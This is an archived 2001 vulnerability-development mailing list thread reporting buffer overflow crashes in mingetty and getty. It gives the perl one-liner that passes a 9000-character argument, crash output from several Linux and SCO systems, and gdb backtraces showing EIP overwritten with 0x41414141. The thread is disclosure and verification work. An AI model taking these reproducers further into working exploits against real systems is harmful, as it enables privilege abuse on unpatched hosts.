Vulnerability Development mailing list archives

core dump on mingetty and getty

From: KF <dotslash () snosoft com>
Date: Mon, 03 Dec 2001 13:33:58 -0500

Getty is also vuln. Tested on Mandrake 8 and SCO unix 5.0.5 

[elguapo@linux elguapo]$ /sbin/mingetty `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
[elguapo@linux elguapo]$ /sbin/getty `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
[elguapo@linux elguapo]$ uname -a
Linux linux.ckfr.com 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686
unknown
[elguapo@linux elguapo]$ cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586

# /etc/getty `perl -e 'print "A" x 9000'`
Memory fault - core dumped
# uname -a
SCO_SV unixdev 3.2 5.0.5 i386

root () sco checkfree com #/etc/getty `perl -e 'print "A" x 9000'`
Memory fault - core dumped
root () sco checkfree com #uname -a
SCO_SV sco 3.2 5.0.6 i386

Getty:
Program received signal SIGSEGV, Segmentation fault.
0x40058b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40058b66 in getenv () from /lib/libc.so.6
#1  0x400a6bb3 in _IO_file_close_it () from /lib/libc.so.6
#2  0x400ab1f5 in mallopt () from /lib/libc.so.6
#3  0x400a716d in malloc () from /lib/libc.so.6
#4  0x4009998e in fopen () from /lib/libc.so.6
#5  0x0804d029 in send ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

mingetty:
Starting program: /sbin/mingetty `perl -e 'print "A" x 9000'`
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x4007bab7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x4007bab7 in vfprintf () from /lib/libc.so.6
#1  0x40097722 in vsprintf () from /lib/libc.so.6
#2  0x08048ec9 in alarm ()
#3  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF 


smackenz wrote:


*nix Issue - Anyone with 'mingetty':

After all the vi overflows, and wu-ftpd etc recently I thought I would have a
sniff around a default redhat 7.1 box too see what I could find.  Anyway I
managed to dump core on /sbin/mingetty and thought it would be worth
reporting:

See below for the shell out:

[m0le@mainframe m0le]$ /sbin/mingetty `perl -e 'print "A"x9000'`
Segmentation fault (core dumped)
[m0le@mainframe m0le]$ id
uid=500(m0le) gid=500(m0le) groups=500(m0le)

(standard user account)

This only works by doing this:

/sbin/mingetty `perl -e 'print "A"x9000'`

when I did the following:

[m0le@mainframe m0le]$ cd /sbin
[m0le@mainframe /sbin]$ ./mingetty `perl -e 'print "A"x9000'`
Segmentation fault
[m0le@mainframe /sbin]$

No core dump....  It doesn't seem to dump in the sbin directory, however I've
successfully dumped from several other dir's.

I am running a RedHat7.1.  I would appreciate some feedback from other
distros whith mingetty running.

Thanks

Scott Mackenzie.

Current thread:

Can anyone verify a core dump on /sbin/mingetty smackenz (Dec 03)
- core dump on mingetty and getty KF (Dec 03)
  - Re: core dump on mingetty and getty Ryan Yagatich (Dec 03)
    - Re: core dump on mingetty and getty Nelson Sampaio Araujo Junior (Dec 03)
    - Re: core dump on mingetty and getty G . Cohen (Dec 03)
  - Re: core dump on mingetty and getty Patrick Patterson (Dec 03)
  - Re: core dump on mingetty and getty Sean Davis (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty Pedro Miller Rabinovitch (Dec 03)
  - Re: Can anyone verify a core dump on /sbin/mingetty Chip Mefford (Dec 03)
    - Re: Can anyone verify a core dump on /sbin/mingetty J.R. Blain (Dec 03)
    - Re: Can anyone verify a core dump on /sbin/mingetty KF (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty - FOLLOW UP - Getty also dumping core Scott Mackenzie (Dec 03)

(Thread continues...)